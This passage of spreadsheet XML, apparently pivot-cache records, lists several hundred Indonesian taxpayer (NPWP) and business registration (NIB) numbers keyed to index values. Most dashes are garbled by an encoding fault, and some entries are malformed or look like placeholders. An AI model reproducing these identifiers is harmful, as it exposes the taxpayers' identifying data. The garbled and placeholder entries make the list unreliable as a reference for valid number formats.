  <r>
    <x v="666"/>
    <s v="nib"/>
    <n v="9120208262812"/>
  </r>
  <r>
    <x v="667"/>
    <s v="npwp"/>
    <s v="83‚Äì136‚Äì812‚Äì1‚Äì513‚Äì000"/>
  </r>
  <r>
    <x v="668"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="668"/>
    <s v="nib"/>
    <n v="9120306281441"/>
  </r>
  <r>
    <x v="669"/>
    <s v="npwp"/>
    <s v="01‚Äì661‚Äì341‚Äì6‚Äì326‚Äì000"/>
  </r>
  <r>
    <x v="670"/>
    <s v="npwp"/>
    <s v="01‚Äì661‚Äì341‚Äì6‚Äì326‚Äì000"/>
  </r>
  <r>
    <x v="671"/>
    <s v="npwp"/>
    <s v="  01.661.341.6-326.000"/>
  </r>
  <r>
    <x v="672"/>
    <s v="npwp"/>
    <s v="01‚Äì661‚Äì341‚Äì6‚Äì326‚Äì000"/>
  </r>
  <r>
    <x v="673"/>
    <s v="npwp"/>
    <s v="83‚Äì045‚Äì255‚Äì3‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="674"/>
    <s v="npwp"/>
    <s v="01‚Äì715‚Äì011‚Äì1‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="675"/>
    <s v="npwp"/>
    <s v="01‚Äì880‚Äì279‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="675"/>
    <s v="nib"/>
    <n v="8120203932369"/>
  </r>
  <r>
    <x v="676"/>
    <s v="npwp"/>
    <s v="75‚Äì775‚Äì913‚Äì9‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="676"/>
    <s v="nib"/>
    <n v="220105300838"/>
  </r>
  <r>
    <x v="677"/>
    <s v="npwp"/>
    <s v="02‚Äì321‚Äì173‚Äì3‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="677"/>
    <s v="nib"/>
    <n v="8120012082528"/>
  </r>
  <r>
    <x v="678"/>
    <s v="npwp"/>
    <s v="80.260.064.3 609.000"/>
  </r>
  <r>
    <x v="679"/>
    <s v="npwp"/>
    <s v="64‚Äì254‚Äì932‚Äì3‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="679"/>
    <s v="nib"/>
    <n v="9120401860515"/>
  </r>
  <r>
    <x v="680"/>
    <s v="npwp"/>
    <s v="03‚Äì095‚Äì705‚Äì4‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="680"/>
    <s v="nib"/>
    <n v="9120004361723"/>
  </r>
  <r>
    <x v="681"/>
    <s v="npwp"/>
    <s v="24‚Äì821‚Äì111‚Äì2‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="681"/>
    <s v="nib"/>
    <n v="8120010270953"/>
  </r>
  <r>
    <x v="682"/>
    <s v="npwp"/>
    <s v="07‚Äì201‚Äì794‚Äì0‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="683"/>
    <s v="npwp"/>
    <s v="73‚Äì361‚Äì880‚Äì5‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="684"/>
    <s v="npwp"/>
    <s v="02‚Äì555‚Äì639‚Äì0‚Äì902‚Äì000"/>
  </r>
  <r>
    <x v="685"/>
    <s v="npwp"/>
    <s v="02‚Äì749‚Äì622‚Äì3‚Äì908‚Äì000"/>
  </r>
  <r>
    <x v="685"/>
    <s v="nib"/>
    <n v="8120000890084"/>
  </r>
  <r>
    <x v="686"/>
    <s v="npwp"/>
    <s v="02‚Äì797‚Äì983‚Äì0‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="687"/>
    <s v="npwp"/>
    <s v="02‚Äì268‚Äì035‚Äì9‚Äì273‚Äì001"/>
  </r>
  <r>
    <x v="687"/>
    <s v="nib"/>
    <n v="8120111021183"/>
  </r>
  <r>
    <x v="688"/>
    <s v="npwp"/>
    <s v="15‚Äì689‚Äì463‚Äì6‚Äì807‚Äì000"/>
  </r>
  <r>
    <x v="689"/>
    <s v="npwp"/>
    <s v="75‚Äì430‚Äì254‚Äì5‚Äì516‚Äì000"/>
  </r>
  <r>
    <x v="690"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì797‚Äì5‚Äì058‚Äì000"/>
  </r>
  <r>
    <x v="690"/>
    <s v="nib"/>
    <n v="8120015280138"/>
  </r>
  <r>
    <x v="691"/>
    <s v="npwp"/>
    <s v="02‚Äì967‚Äì929‚Äì7‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="692"/>
    <s v="npwp"/>
    <s v="02‚Äì638‚Äì777‚Äì9‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="693"/>
    <s v="npwp"/>
    <s v="73‚Äì461‚Äì332‚Äì6‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="694"/>
    <s v="npwp"/>
    <s v="74‚Äì126‚Äì424‚Äì6‚Äì942‚Äì000"/>
  </r>
  <r>
    <x v="695"/>
    <s v="npwp"/>
    <s v="03‚Äì236‚Äì749‚Äì2‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="696"/>
    <s v="npwp"/>
    <s v="31‚Äì795‚Äì668‚Äì8‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="697"/>
    <s v="npwp"/>
    <s v="01‚Äì300‚Äì156‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="698"/>
    <s v="npwp"/>
    <s v="80‚Äì052‚Äì096‚Äì7‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="699"/>
    <s v="npwp"/>
    <s v="02‚Äì020‚Äì393‚Äì1‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="700"/>
    <s v="npwp"/>
    <s v="03‚Äì167‚Äì505‚Äì1‚Äì732‚Äì001"/>
  </r>
  <r>
    <x v="700"/>
    <s v="nib"/>
    <n v="9120216021473"/>
  </r>
  <r>
    <x v="701"/>
    <s v="npwp"/>
    <s v="66‚Äì879‚Äì172‚Äì6‚Äì102‚Äì000"/>
  </r>
  <r>
    <x v="702"/>
    <s v="npwp"/>
    <s v="14‚Äì829‚Äì077‚Äì8‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="703"/>
    <s v="npwp"/>
    <s v="03‚Äì167‚Äì505‚Äì1‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="703"/>
    <s v="nib"/>
    <n v="9120216021473"/>
  </r>
  <r>
    <x v="704"/>
    <s v="npwp"/>
    <s v="83‚Äì830‚Äì390‚Äì7‚Äì813‚Äì000"/>
  </r>
  <r>
    <x v="705"/>
    <s v="npwp"/>
    <s v="83.604.558.3-001.000"/>
  </r>
  <r>
    <x v="706"/>
    <s v="npwp"/>
    <s v="31‚Äì452‚Äì552‚Äì8‚Äì119‚Äì000"/>
  </r>
  <r>
    <x v="706"/>
    <s v="nib"/>
    <n v="8120216270572"/>
  </r>
  <r>
    <x v="707"/>
    <s v="npwp"/>
    <s v="02‚Äì798‚Äì477‚Äì2‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="708"/>
    <s v="npwp"/>
    <s v="84‚Äì381‚Äì071‚Äì4‚Äì447‚Äì000"/>
  </r>
  <r>
    <x v="709"/>
    <s v="npwp"/>
    <s v="84‚Äì386‚Äì296‚Äì2‚Äì447‚Äì000"/>
  </r>
  <r>
    <x v="710"/>
    <s v="npwp"/>
    <s v="73‚Äì405‚Äì229‚Äì3‚Äì602‚Äì000"/>
  </r>
  <r>
    <x v="711"/>
    <s v="npwp"/>
    <s v="31‚Äì722‚Äì340‚Äì2‚Äì401‚Äì000"/>
  </r>
  <r>
    <x v="712"/>
    <s v="npwp"/>
    <s v="03‚Äì092‚Äì630‚Äì7‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="712"/>
    <s v="nib"/>
    <n v="8120011281528"/>
  </r>
  <r>
    <x v="713"/>
    <s v="npwp"/>
    <s v="71‚Äì333‚Äì253‚Äì4‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="714"/>
    <s v="npwp"/>
    <s v="02‚Äì825‚Äì085‚Äì0‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="714"/>
    <s v="nib"/>
    <n v="8120118041591"/>
  </r>
  <r>
    <x v="715"/>
    <s v="npwp"/>
    <s v="73‚Äì846‚Äì738‚Äì0‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="716"/>
    <s v="npwp"/>
    <s v="02‚Äì379‚Äì509‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="717"/>
    <s v="npwp"/>
    <s v="83‚Äì377‚Äì539‚Äì8‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="718"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì903‚Äì001"/>
  </r>
  <r>
    <x v="718"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="719"/>
    <s v="npwp"/>
    <s v="31‚Äì698‚Äì193‚Äì5‚Äì304‚Äì000"/>
  </r>
  <r>
    <x v="719"/>
    <s v="nib"/>
    <n v="9120311250754"/>
  </r>
  <r>
    <x v="720"/>
    <s v="npwp"/>
    <s v="72‚Äì812‚Äì144‚Äì3‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="720"/>
    <s v="nib"/>
    <n v="8120009950656"/>
  </r>
  <r>
    <x v="721"/>
    <s v="npwp"/>
    <s v="83.423.330.6-304.000 "/>
  </r>
  <r>
    <x v="721"/>
    <s v="nib"/>
    <n v="220000141824"/>
  </r>
  <r>
    <x v="722"/>
    <s v="npwp"/>
    <s v="82‚Äì516‚Äì601‚Äì0‚Äì732‚Äì000"/>
  </r>
  <r>
    <x v="723"/>
    <s v="npwp"/>
    <s v="01‚Äì871‚Äì415‚Äì4‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="724"/>
    <s v="npwp"/>
    <s v="01‚Äì495‚Äì316‚Äì0‚Äì415‚Äì000"/>
  </r>
  <r>
    <x v="725"/>
    <s v="npwp"/>
    <s v="71‚Äì201‚Äì427‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="726"/>
    <s v="npwp"/>
    <s v="83‚Äì789‚Äì387‚Äì4‚Äì027‚Äì000"/>
  </r>
  <r>
    <x v="727"/>
    <s v="npwp"/>
    <s v="76.328.063.3-942.000"/>
  </r>
  <r>
    <x v="728"/>
    <s v="npwp"/>
    <s v="31‚Äì174‚Äì375‚Äì1‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="729"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì051‚Äì000"/>
  </r>
  <r>
    <x v="729"/>
    <s v="nib"/>
    <n v="8120003713913"/>
  </r>
  <r>
    <x v="730"/>
    <s v="npwp"/>
    <s v="31‚Äì439‚Äì379‚Äì4‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="731"/>
    <s v="npwp"/>
    <s v="84‚Äì451‚Äì802‚Äì7‚Äì409‚Äì001"/>
  </r>
  <r>
    <x v="732"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì254‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="733"/>
    <s v="npwp"/>
    <s v="02‚Äì036‚Äì274‚Äì5‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="734"/>
    <s v="npwp"/>
    <s v="02‚Äì257‚Äì037‚Äì8‚Äì607‚Äì000"/>
  </r>
  <r>
    <x v="734"/>
    <s v="nib"/>
    <n v="9120007192192"/>
  </r>
  <r>
    <x v="735"/>
    <s v="npwp"/>
    <s v="74‚Äì501‚Äì651‚Äì9‚Äì943‚Äì000"/>
  </r>
  <r>
    <x v="736"/>
    <s v="npwp"/>
    <s v="01‚Äì718‚Äì918‚Äì4‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="736"/>
    <s v="nib"/>
    <n v="8120002702482"/>
  </r>
  <r>
    <x v="737"/>
    <s v="npwp"/>
    <n v="347852832645000"/>
  </r>
  <r>
    <x v="737"/>
    <s v="nib"/>
    <n v="9120205251836"/>
  </r>
  <r>
    <x v="738"/>
    <s v="npwp"/>
    <s v="03‚Äì008‚Äì406‚Äì5‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="739"/>
    <s v="npwp"/>
    <s v="70‚Äì632‚Äì118‚Äì9‚Äì545‚Äì000"/>
  </r>
  <r>
    <x v="740"/>
    <s v="npwp"/>
    <s v="70‚Äì883‚Äì593‚Äì9‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="741"/>
    <s v="npwp"/>
    <s v="74.829.241.4-214.000"/>
  </r>
  <r>
    <x v="742"/>
    <s v="npwp"/>
    <s v="58‚Äì717‚Äì548‚Äì0‚Äì545‚Äì000"/>
  </r>
  <r>
    <x v="742"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="743"/>
    <s v="npwp"/>
    <s v="03‚Äì060‚Äì626‚Äì5‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="743"/>
    <s v="nib"/>
    <n v="8120101950772"/>
  </r>
  <r>
    <x v="744"/>
    <s v="npwp"/>
    <s v="83‚Äì820‚Äì537‚Äì5‚Äì922‚Äì000"/>
  </r>
  <r>
    <x v="745"/>
    <s v="npwp"/>
    <n v="780961421334000"/>
  </r>
  <r>
    <x v="746"/>
    <s v="npwp"/>
    <s v="69.831.434.1-333.000"/>
  </r>
  <r>
    <x v="747"/>
    <s v="npwp"/>
    <n v="1.8177728838888301E+17"/>
  </r>
  <r>
    <x v="748"/>
    <s v="npwp"/>
    <s v="75‚Äì308‚Äì479‚Äì7‚Äì334‚Äì000"/>
  </r>
  <r>
    <x v="749"/>
    <s v="npwp"/>
    <s v="22‚Äì000‚Äì000‚Äì0‚Äì003‚Äì333"/>
  </r>
  <r>
    <x v="750"/>
    <s v="npwp"/>
    <s v="12‚Äì432‚Äì452‚Äì5‚Äì262‚Äì627"/>
  </r>
  <r>
    <x v="751"/>
    <s v="npwp"/>
    <s v="75‚Äì547‚Äì999‚Äì5‚Äì085‚Äì000"/>
  </r>
  <r>
    <x v="752"/>
    <s v="npwp"/>
    <s v="12‚Äì345‚Äì678‚Äì9‚Äì011‚Äì234"/>
  </r>
  <r>
    <x v="753"/>
    <s v="npwp"/>
    <n v="23165001"/>
  </r>
  <r>
    <x v="754"/>
    <s v="npwp"/>
    <s v="03‚Äì033‚Äì188‚Äì8‚Äì942‚Äì000"/>
  </r>
  <r>
    <x v="755"/>
    <s v="npwp"/>
    <s v="01‚Äì730‚Äì960‚Äì0‚Äì012‚Äì000"/>
  </r>
  <r>
    <x v="755"/>
    <s v="nib"/>
    <n v="8120103853616"/>
  </r>
  <r>
    <x v="756"/>
    <s v="npwp"/>
    <s v="02‚Äì908‚Äì538‚Äì8‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="757"/>
    <s v="npwp"/>
    <s v="66‚Äì569‚Äì558‚Äì1‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="758"/>
    <s v="npwp"/>
    <s v="76‚Äì457‚Äì680‚Äì7‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="758"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="759"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì691‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="760"/>
    <s v="npwp"/>
    <s v="01‚Äì328‚Äì570‚Äì5‚Äì007‚Äì000"/>
  </r>
  <r>
    <x v="761"/>
    <s v="npwp"/>
    <s v="02‚Äì602‚Äì418‚Äì2‚Äì905‚Äì000"/>
  </r>
  <r>
    <x v="761"/>
    <s v="nib"/>
    <n v="8120107821031"/>
  </r>
  <r>
    <x v="762"/>
    <s v="npwp"/>
    <s v="64‚Äì204‚Äì735‚Äì1‚Äì713‚Äì000"/>
  </r>
  <r>
    <x v="763"/>
    <s v="npwp"/>
    <s v="01‚Äì317‚Äì659‚Äì9‚Äì416‚Äì001"/>
  </r>
  <r>
    <x v="764"/>
    <s v="npwp"/>
    <s v="03‚Äì160‚Äì560‚Äì3‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="764"/>
    <s v="nib"/>
    <n v="8120000702928"/>
  </r>
  <r>
    <x v="765"/>
    <s v="npwp"/>
    <s v="21‚Äì095‚Äì797‚Äì3‚Äì013‚Äì000"/>
  </r>
  <r>
    <x v="765"/>
    <s v="nib"/>
    <n v="8120005961294"/>
  </r>
  <r>
    <x v="766"/>
    <s v="npwp"/>
    <s v="03‚Äì084‚Äì949‚Äì1‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="767"/>
    <s v="npwp"/>
    <s v="02‚Äì687‚Äì504‚Äì7‚Äì803‚Äì000"/>
  </r>
  <r>
    <x v="768"/>
    <s v="npwp"/>
    <s v="76.410.117.6.645.000"/>
  </r>
  <r>
    <x v="769"/>
    <s v="npwp"/>
    <s v="03‚Äì227‚Äì675‚Äì0‚Äì125‚Äì001"/>
  </r>
  <r>
    <x v="769"/>
    <s v="nib"/>
    <n v="8120216151849"/>
  </r>
  <r>
    <x v="770"/>
    <s v="npwp"/>
    <s v="84‚Äì672‚Äì940‚Äì8‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="771"/>
    <s v="npwp"/>
    <s v="73‚Äì594‚Äì234‚Äì4‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="771"/>
    <s v="nib"/>
    <n v="8120113012069"/>
  </r>
  <r>
    <x v="772"/>
    <s v="npwp"/>
    <s v="82‚Äì004‚Äì472‚Äì7‚Äì445‚Äì200"/>
  </r>
  <r>
    <x v="773"/>
    <s v="npwp"/>
    <s v="02‚Äì787‚Äì112‚Äì8‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="774"/>
    <s v="npwp"/>
    <s v="02‚Äì571‚Äì619‚Äì2‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="775"/>
    <s v="npwp"/>
    <s v="31‚Äì280‚Äì264‚Äì8‚Äì607‚Äì000"/>
  </r>
  <r>
    <x v="775"/>
    <s v="nib"/>
    <n v="9120207271888"/>
  </r>
  <r>
    <x v="776"/>
    <s v="npwp"/>
    <s v="03.160.560.3-47.000"/>
  </r>
  <r>
    <x v="777"/>
    <s v="npwp"/>
    <s v="45‚Äì575‚Äì268‚Äì3‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="778"/>
    <s v="npwp"/>
    <s v="82‚Äì558‚Äì671‚Äì2‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="778"/>
    <s v="nib"/>
    <n v="8120000961408"/>
  </r>
  <r>
    <x v="779"/>
    <s v="npwp"/>
    <n v="158753723823000"/>
  </r>
  <r>
    <x v="779"/>
    <s v="nib"/>
    <n v="9120002230683"/>
  </r>
  <r>
    <x v="780"/>
    <s v="npwp"/>
    <s v="02‚Äì256‚Äì916‚Äì0‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="780"/>
    <s v="nib"/>
    <n v="9120205451063"/>
  </r>
  <r>
    <x v="781"/>
    <s v="npwp"/>
    <s v="81‚Äì074‚Äì603‚Äì2‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="782"/>
    <s v="npwp"/>
    <s v="15‚Äì911‚Äì670‚Äì6‚Äì331‚Äì000"/>
  </r>
  <r>
    <x v="783"/>
    <s v="npwp"/>
    <s v="02‚Äì528‚Äì697‚Äì2‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="783"/>
    <s v="nib"/>
    <n v="8120002962402"/>
  </r>
  <r>
    <x v="784"/>
    <s v="npwp"/>
    <s v="45‚Äì882‚Äì546‚Äì0‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="785"/>
    <s v="npwp"/>
    <s v="80‚Äì634‚Äì541‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="785"/>
    <s v="nib"/>
    <n v="8120213260972"/>
  </r>
  <r>
    <x v="786"/>
    <s v="npwp"/>
    <s v="31‚Äì824‚Äì004‚Äì1‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="787"/>
    <s v="npwp"/>
    <s v="35‚Äì758‚Äì201‚Äì4‚Äì411‚Äì000"/>
  </r>
  <r>
    <x v="788"/>
    <s v="npwp"/>
    <s v="82‚Äì127‚Äì307‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="789"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì254‚Äì9‚Äì834‚Äì001"/>
  </r>
  <r>
    <x v="790"/>
    <s v="npwp"/>
    <s v="75‚Äì755‚Äì485‚Äì2‚Äì067‚Äì000"/>
  </r>
  <r>
    <x v="791"/>
    <s v="npwp"/>
    <s v="72‚Äì051‚Äì083‚Äì3‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="792"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="793"/>
    <s v="npwp"/>
    <s v="70‚Äì594‚Äì607‚Äì7‚Äì832‚Äì000"/>
  </r>
  <r>
    <x v="794"/>
    <s v="npwp"/>
    <s v="12‚Äì234‚Äì413‚Äì4‚Äì444‚Äì444"/>
  </r>
  <r>
    <x v="795"/>
    <s v="npwp"/>
    <s v="03‚Äì325‚Äì362‚Äì6‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="795"/>
    <s v="nib"/>
    <n v="9120108352515"/>
  </r>
  <r>
    <x v="796"/>
    <s v="npwp"/>
    <s v="75‚Äì626‚Äì554‚Äì2‚Äì615‚Äì000"/>
  </r>
  <r>
    <x v="797"/>
    <s v="npwp"/>
    <s v="70‚Äì942‚Äì657‚Äì1‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="797"/>
    <s v="nib"/>
    <n v="8120108841644"/>
  </r>
  <r>
    <x v="798"/>
    <s v="npwp"/>
    <s v="02‚Äì759‚Äì303‚Äì7‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="799"/>
    <s v="npwp"/>
    <s v="02‚Äì501‚Äì979‚Äì5‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="799"/>
    <s v="nib"/>
    <n v="9120303362805"/>
  </r>
  <r>
    <x v="800"/>
    <s v="npwp"/>
    <s v="81‚Äì234‚Äì511‚Äì4‚Äì121‚Äì000"/>
  </r>
  <r>
    <x v="800"/>
    <s v="nib"/>
    <n v="8120201822339"/>
  </r>
  <r>
    <x v="801"/>
    <s v="npwp"/>
    <s v="81‚Äì789‚Äì269‚Äì8‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="802"/>
    <s v="npwp"/>
    <s v="02‚Äì255‚Äì451‚Äì3‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="803"/>
    <s v="npwp"/>
    <s v="02‚Äì296‚Äì341‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="803"/>
    <s v="nib"/>
    <n v="8120109911788"/>
  </r>
  <r>
    <x v="804"/>
    <s v="npwp"/>
    <s v="75‚Äì921‚Äì685‚Äì6‚Äì023‚Äì000"/>
  </r>
  <r>
    <x v="805"/>
    <s v="npwp"/>
    <s v="83‚Äì702‚Äì990‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="805"/>
    <s v="nib"/>
    <n v="9120309211523"/>
  </r>
  <r>
    <x v="806"/>
    <s v="npwp"/>
    <s v="01‚Äì148‚Äì487‚Äì0‚Äì054‚Äì000"/>
  </r>
  <r>
    <x v="807"/>
    <s v="npwp"/>
    <s v="31‚Äì708‚Äì946‚Äì4‚Äì516‚Äì000"/>
  </r>
  <r>
    <x v="807"/>
    <s v="nib"/>
    <n v="9120307292025"/>
  </r>
  <r>
    <x v="808"/>
    <s v="npwp"/>
    <s v="01‚Äì870‚Äì966‚Äì7‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="809"/>
    <s v="npwp"/>
    <s v="81‚Äì789‚Äì269‚Äì8‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="810"/>
    <s v="npwp"/>
    <s v="03‚Äì325‚Äì362‚Äì6‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="810"/>
    <s v="nib"/>
    <n v="9120108352515"/>
  </r>
  <r>
    <x v="811"/>
    <s v="npwp"/>
    <s v="01‚Äì510‚Äì676‚Äì8‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="811"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="812"/>
    <s v="npwp"/>
    <s v="01.480.126.0-617.000"/>
  </r>
  <r>
    <x v="813"/>
    <s v="npwp"/>
    <s v="76‚Äì487‚Äì979‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="814"/>
    <s v="npwp"/>
    <s v="83‚Äì517‚Äì516‚Äì7‚Äì834‚Äì000"/>
  </r>
  <r>
    <x v="815"/>
    <s v="npwp"/>
    <s v="73‚Äì373‚Äì179‚Äì9‚Äì834‚Äì000"/>
  </r>
  <r>
    <x v="816"/>
    <s v="npwp"/>
    <s v="84‚Äì240‚Äì578‚Äì9‚Äì629‚Äì000"/>
  </r>
  <r>
    <x v="817"/>
    <s v="npwp"/>
    <s v="66‚Äì299‚Äì229‚Äì6‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="818"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì707‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="818"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="819"/>
    <s v="npwp"/>
    <s v="01‚Äì737‚Äì545‚Äì2‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="820"/>
    <s v="npwp"/>
    <s v="01‚Äì519‚Äì308‚Äì3‚Äì240‚Äì000"/>
  </r>
  <r>
    <x v="821"/>
    <s v="npwp"/>
    <s v="21‚Äì123‚Äì122‚Äì0‚Äì401‚Äì000"/>
  </r>
  <r>
    <x v="821"/>
    <s v="nib"/>
    <n v="8120316002347"/>
  </r>
  <r>
    <x v="822"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="823"/>
    <s v="npwp"/>
    <s v="02‚Äì682‚Äì024‚Äì1‚Äì823‚Äì001"/>
  </r>
  <r>
    <x v="824"/>
    <s v="npwp"/>
    <s v="01‚Äì907‚Äì803‚Äì9‚Äì732‚Äì000"/>
  </r>
  <r>
    <x v="825"/>
    <s v="npwp"/>
    <s v="83‚Äì530‚Äì751‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="826"/>
    <s v="npwp"/>
    <s v="97‚Äì325‚Äì265‚Äì3‚Äì527‚Äì000"/>
  </r>
  <r>
    <x v="827"/>
    <s v="npwp"/>
    <s v="78‚Äì994‚Äì938‚Äì5‚Äì527‚Äì000"/>
  </r>
  <r>
    <x v="828"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="828"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="829"/>
    <s v="npwp"/>
    <s v="01‚Äì718‚Äì918‚Äì4‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="829"/>
    <s v="nib"/>
    <n v="8120002702482"/>
  </r>
  <r>
    <x v="830"/>
    <s v="npwp"/>
    <s v="09‚Äì671‚Äì270‚Äì8‚Äì037‚Äì000"/>
  </r>
  <r>
    <x v="831"/>
    <s v="npwp"/>
    <s v="66‚Äì029‚Äì449‚Äì7‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="832"/>
    <s v="npwp"/>
    <s v="75‚Äì975‚Äì920‚Äì2‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="833"/>
    <s v="npwp"/>
    <s v="06‚Äì778‚Äì062‚Äì7‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="833"/>
    <s v="nib"/>
    <n v="8120001872175"/>
  </r>
  <r>
    <x v="834"/>
    <s v="npwp"/>
    <s v="03‚Äì183‚Äì089‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="835"/>
    <s v="npwp"/>
    <s v="02‚Äì265‚Äì968‚Äì4‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="835"/>
    <s v="nib"/>
    <n v="9120116281675"/>
  </r>
  <r>
    <x v="836"/>
    <s v="npwp"/>
    <s v="66‚Äì288‚Äì124‚Äì2‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="836"/>
    <s v="nib"/>
    <n v="8120013162023"/>
  </r>
  <r>
    <x v="837"/>
    <s v="npwp"/>
    <s v="84‚Äì519‚Äì102‚Äì2‚Äì404‚Äì000"/>
  </r>
  <r>
    <x v="838"/>
    <s v="npwp"/>
    <s v="01‚Äì772‚Äì287‚Äì7‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="839"/>
    <s v="npwp"/>
    <s v="70‚Äì424‚Äì387‚Äì2‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="840"/>
    <s v="npwp"/>
    <s v="01‚Äì772‚Äì287‚Äì7‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="840"/>
    <s v="nib"/>
    <n v="8120007712953"/>
  </r>
  <r>
    <x v="841"/>
    <s v="npwp"/>
    <s v="02‚Äì714‚Äì433‚Äì6‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="841"/>
    <s v="nib"/>
    <n v="8120104970777"/>
  </r>
  <r>
    <x v="842"/>
    <s v="npwp"/>
    <s v="01‚Äì233‚Äì603‚Äì8‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="843"/>
    <s v="npwp"/>
    <s v="72‚Äì714‚Äì169‚Äì9‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="844"/>
    <s v="npwp"/>
    <s v="84‚Äì672‚Äì940‚Äì8‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="845"/>
    <s v="npwp"/>
